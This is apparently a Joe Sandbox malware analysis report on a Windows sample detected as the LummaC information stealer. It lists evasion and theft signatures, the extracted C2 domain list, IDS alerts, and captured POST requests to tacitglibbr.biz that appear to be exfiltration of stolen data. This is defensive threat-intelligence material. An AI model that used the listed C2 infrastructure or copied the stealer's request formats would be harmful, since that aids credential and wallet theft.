Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wf1Ps82LYF.exe

Overview

General Information

Sample name:wf1Ps82LYF.exe
renamed because original name is a hash value
Original sample name:9b88afc4511d0fe8aca6080d34f2dd66.exe
Analysis ID:1576242
MD5:9b88afc4511d0fe8aca6080d34f2dd66
SHA1:4d0abcc2f053e2b17d3064f65dffc171f873b043
SHA256:5d2b5f0d8b9fbfb231b99678bb332bee9cfef9aa6c2ed7e994dbabbb83639004
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • wf1Ps82LYF.exe (PID: 7588 cmdline: "C:\Users\user\Desktop\wf1Ps82LYF.exe" MD5: 9B88AFC4511D0FE8ACA6080D34F2DD66)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["awake-weaves.cyou", "debonairnukk.xyz", "effecterectz.xyz", "wrathful-jammy.cyou", "diffuculttan.xyz", "tacitglibbr.biz", "deafeninggeh.biz", "sordid-snaked.cyou", "immureprech.biz"], "Build id": "PsFKDg--pablo"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1540480401.0000000001068000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1540788781.0000000001068000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: wf1Ps82LYF.exe PID: 7588JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: wf1Ps82LYF.exe PID: 7588JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: wf1Ps82LYF.exe PID: 7588JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                Click to see the 1 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-16T17:15:02.013493+010020283713Unknown Traffic192.168.2.849706104.21.50.161443TCP
                2024-12-16T17:15:04.115519+010020283713Unknown Traffic192.168.2.849707104.21.50.161443TCP
                2024-12-16T17:15:06.573219+010020283713Unknown Traffic192.168.2.849708104.21.50.161443TCP
                2024-12-16T17:15:08.827724+010020283713Unknown Traffic192.168.2.849709104.21.50.161443TCP
                2024-12-16T17:15:11.598593+010020283713Unknown Traffic192.168.2.849710104.21.50.161443TCP
                2024-12-16T17:15:14.243882+010020283713Unknown Traffic192.168.2.849711104.21.50.161443TCP
                2024-12-16T17:15:16.747072+010020283713Unknown Traffic192.168.2.849712104.21.50.161443TCP
                2024-12-16T17:15:20.493181+010020283713Unknown Traffic192.168.2.849715104.21.50.161443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-16T17:15:02.821315+010020546531A Network Trojan was detected192.168.2.849706104.21.50.161443TCP
                2024-12-16T17:15:04.875796+010020546531A Network Trojan was detected192.168.2.849707104.21.50.161443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-16T17:15:02.821315+010020498361A Network Trojan was detected192.168.2.849706104.21.50.161443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-16T17:15:04.875796+010020498121A Network Trojan was detected192.168.2.849707104.21.50.161443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-16T17:15:02.013493+010020582311Domain Observed Used for C2 Detected192.168.2.849706104.21.50.161443TCP
                2024-12-16T17:15:04.115519+010020582311Domain Observed Used for C2 Detected192.168.2.849707104.21.50.161443TCP
                2024-12-16T17:15:06.573219+010020582311Domain Observed Used for C2 Detected192.168.2.849708104.21.50.161443TCP
                2024-12-16T17:15:08.827724+010020582311Domain Observed Used for C2 Detected192.168.2.849709104.21.50.161443TCP
                2024-12-16T17:15:11.598593+010020582311Domain Observed Used for C2 Detected192.168.2.849710104.21.50.161443TCP
                2024-12-16T17:15:14.243882+010020582311Domain Observed Used for C2 Detected192.168.2.849711104.21.50.161443TCP
                2024-12-16T17:15:16.747072+010020582311Domain Observed Used for C2 Detected192.168.2.849712104.21.50.161443TCP
                2024-12-16T17:15:20.493181+010020582311Domain Observed Used for C2 Detected192.168.2.849715104.21.50.161443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-16T17:15:00.530872+010020582301Domain Observed Used for C2 Detected192.168.2.8593011.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-16T17:15:07.438616+010020480941Malware Command and Control Activity Detected192.168.2.849708104.21.50.161443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: wf1Ps82LYF.exeAvira: detected
                Source: https://tacitglibbr.biz/jLIAvira URL Cloud: Label: malware
                Source: https://tacitglibbr.biz:443/apiDQAvira URL Cloud: Label: malware
                Source: https://tacitglibbr.biz/sZ7Avira URL Cloud: Label: malware
                Source: https://tacitglibbr.biz:443/apilAvira URL Cloud: Label: malware
                Source: https://tacitglibbr.biz/apizTAvira URL Cloud: Label: malware
                Source: https://tacitglibbr.biz:443/apin.txtPKAvira URL Cloud: Label: malware
                Source: https://tacitglibbr.biz/dAvira URL Cloud: Label: malware
                Source: https://tacitglibbr.biz/MAvira URL Cloud: Label: malware
                Source: https://tacitglibbr.biz/pilAvira URL Cloud: Label: malware
                Source: https://tacitglibbr.biz/apillAvira URL Cloud: Label: malware
                Source: wf1Ps82LYF.exe.7588.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["awake-weaves.cyou", "debonairnukk.xyz", "effecterectz.xyz", "wrathful-jammy.cyou", "diffuculttan.xyz", "tacitglibbr.biz", "deafeninggeh.biz", "sordid-snaked.cyou", "immureprech.biz"], "Build id": "PsFKDg--pablo"}
                Source: wf1Ps82LYF.exeReversingLabs: Detection: 44%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: wf1Ps82LYF.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: sordid-snaked.cyou
                Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: awake-weaves.cyou
                Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: wrathful-jammy.cyou
                Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: debonairnukk.xyz
                Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: diffuculttan.xyz
                Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: effecterectz.xyz
                Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: deafeninggeh.biz
                Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: immureprech.biz
                Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: tacitglibbr.biz
                Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: PsFKDg--pablo
                Source: wf1Ps82LYF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.8:49712 version: TLS 1.2
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058230 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz) : 192.168.2.8:59301 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.8:49708 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.8:49707 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.8:49709 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.8:49706 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.8:49710 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.8:49715 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.8:49712 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.8:49711 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49707 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49706 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49708 -> 104.21.50.161:443
                Source: Malware configuration extractorURLs: awake-weaves.cyou
                Source: Malware configuration extractorURLs: debonairnukk.xyz
                Source: Malware configuration extractorURLs: effecterectz.xyz
                Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                Source: Malware configuration extractorURLs: diffuculttan.xyz
                Source: Malware configuration extractorURLs: tacitglibbr.biz
                Source: Malware configuration extractorURLs: deafeninggeh.biz
                Source: Malware configuration extractorURLs: sordid-snaked.cyou
                Source: Malware configuration extractorURLs: immureprech.biz
                Source: Joe Sandbox ViewIP Address: 104.21.50.161 104.21.50.161
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 104.21.50.161:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.50.161:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tacitglibbr.biz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: tacitglibbr.biz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EF839D2LLWKORXY5BOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12846Host: tacitglibbr.biz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2MMU31FEZ74BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15039Host: tacitglibbr.biz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=140DF29UV4GHEDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20218Host: tacitglibbr.biz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AIDRU3R1C98DTLM9H35User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1249Host: tacitglibbr.biz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0EHZDQXPSN9Y7DEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587708Host: tacitglibbr.biz
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: tacitglibbr.biz
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tacitglibbr.biz
                Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: wf1Ps82LYF.exe, 00000000.00000003.1513934245.0000000005D0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: wf1Ps82LYF.exe, 00000000.00000003.1513934245.0000000005D0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: wf1Ps82LYF.exe, 00000000.00000002.1620621391.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540730534.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1512232664.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1536299453.0000000005A73000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578306795.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000002.1618128391.00000000010E3000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1565482886.00000000010E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/
                Source: wf1Ps82LYF.exe, 00000000.00000003.1536686995.0000000005A73000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1536997543.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540730534.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1536299453.0000000005A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/M
                Source: wf1Ps82LYF.exe, wf1Ps82LYF.exe, 00000000.00000003.1615801963.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1616158782.000000000106A000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578681212.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578765912.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000002.1618128391.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000002.1618045816.000000000106C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/api
                Source: wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/apill
                Source: wf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1616158782.000000000106A000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000002.1618045816.000000000106C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/apizT
                Source: wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/d
                Source: wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/jLI
                Source: wf1Ps82LYF.exe, 00000000.00000003.1578681212.00000000010E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/pi
                Source: wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/pil
                Source: wf1Ps82LYF.exe, 00000000.00000003.1565482886.00000000010E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/sZ7
                Source: wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz:443/api
                Source: wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz:443/apiDQ
                Source: wf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578765912.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz:443/apil
                Source: wf1Ps82LYF.exe, 00000000.00000002.1617971497.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540480401.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1565544561.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578765912.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540788781.0000000001052000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz:443/apin.txtPK
